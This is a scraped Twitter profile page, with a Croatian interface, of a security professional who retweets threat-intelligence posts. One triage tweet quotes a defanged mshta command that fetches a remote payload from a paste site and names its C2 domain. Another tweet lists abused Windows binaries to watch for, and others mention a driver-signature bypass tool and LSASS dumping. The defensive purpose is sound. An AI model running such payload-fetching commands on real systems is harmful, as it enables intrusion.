Nader Shalabi

@nader_shalabi

Manager, . Following the digital [chaos] and threats landscape. My opinions are my own. /

Vrijeme pridruživanja: travanj 2013.

Tweetovi

Blokirali ste korisnika/cu @nader_shalabi

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @nader_shalabi

  1. Prikvačeni tweet
    27. svi 2019.

    Pushed new version of ATT&CK View: -New ATT&CK content -New ATOMIC Red Team content -ATT&CK Data Models Updated -Uploaded an XML representation of the original ATT&CK JSON content -UI enhancements and bug fixes

    Poništi
  2. proslijedio/la je Tweet
    prije 12 sati

    BREAKING: Twitter says a suspected state-sponsored actor used its API to match usernames to phone numbers - Attack took place on December 24, 2019 - Twitter said attack came from IPs in Iran, Israel, and Malaysia

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet

    To the person who figured out my honeypot is a honeypot could you please stop putting the picture of Pooh bear with a jar of honey on it? Its like this person's life mission, I've blocked him on: - Client - IPs (now on Tor ffs) - The image (he just edits 1 pixel every time...)

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    2. velj

    I added a script to generate the PDF & archive for my Exam Report Template in Markdown, as I saw a lot of people where creating their own scripts.

    Poništi
  5. proslijedio/la je Tweet
    2. velj

    KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore,

    Poništi
  6. proslijedio/la je Tweet
    29. sij

    I made a goose that destroys your computer Download it free here:

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    1. velj

    Some essential process execution/cmd lines to monitor for initial access/persist. powershell cmd rundll32 control wscript javaw csc regsvr32 reg certutil bitsadmin schtasks wmic eqnedt32 msiexec cmstp mshta hh curl installutil regsvcs/regasm at msbuild sc cscript msxsl runonce

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    30. sij

    in-memory traces of ppldump, exploiting zam64.sys vulndriver to dump lsass memory, cool stuff. sysmon will show a generic\noisy calltrace so detection chances here are low, if combined with lsass loading dbgcore.dll it may work.

    Poništi
  9. proslijedio/la je Tweet
    30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    29. sij

    Need a SOC Reference Architecture? Check out this one we put together to show how Microsoft technology integrates into a SOC. Slide 73 of Azure Security Compass -

    Poništi
  11. proslijedio/la je Tweet
    28. sij

    network protocols

    Poništi
  12. proslijedio/la je Tweet
    28. sij

    New Blog Post from on Azure. Ryan discusses Azure and Azure AD's components, reviews some of the attacks, and release PowerZure to help understand the attacks. Link: PowerZure:

    Poništi
  13. 28. sij

    "JavaScript Libraries Are Almost Never Updated Once Installed"

    Poništi
  14. proslijedio/la je Tweet
    27. sij

    Amazing: a termite track (top) and an ant track (bottom) • each travelling insect is protected by its own column of soldiers, no fights necessary | 📹 via Mehdi Moussaid

    Poništi
  15. proslijedio/la je Tweet
    27. sij

    sLoad, the PowerShell-based Trojan downloader notable for its almost exclusive use of the Background Intelligent Transfer Service (BITS) for malicious activities, has launched version 2.0. Read about what's changed in our new blog:

    Poništi
  16. proslijedio/la je Tweet
    27. sij

    Have you analysed a new online threat? Know a new way to defend against such threats? Are you tasked with securing systems & fending off attacks? The Call for Papers for is open and we want to hear from you! VB2020: 30 Sept - 2 Oct, Dublin, Ireland

    Poništi
  17. proslijedio/la je Tweet
    25. sij

    I came to know that the 's hex editor is unbearable in the dark mode, so I fixed it. New release: 0.4.0.1 is out:

    Poništi
  18. proslijedio/la je Tweet

    diversity is good

    chinese tang dynasty art version of woman yelling at cat meme
    egyptian hieroglyph art version of woman yelling at cat meme
    japanese woodblock art version of woman yelling at cat meme
    Prikaži ovu nit
    Poništi
  19. proslijedio/la je Tweet
    24. sij

    Our malware hunting service is now live. We continue to develop with our team. |

    Poništi
  20. proslijedio/la je Tweet
    22. sij

    Here is the link to the SpecterOps Adversary Tactics: PowerShell course material: Enjoy! For information about our current training offerings, information can be found here: (4/4)

    Prikaži ovu nit
    Poništi
  21. 22. sij

    This is my favorite thing now, looking at document submissions! 🤦‍♂️

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·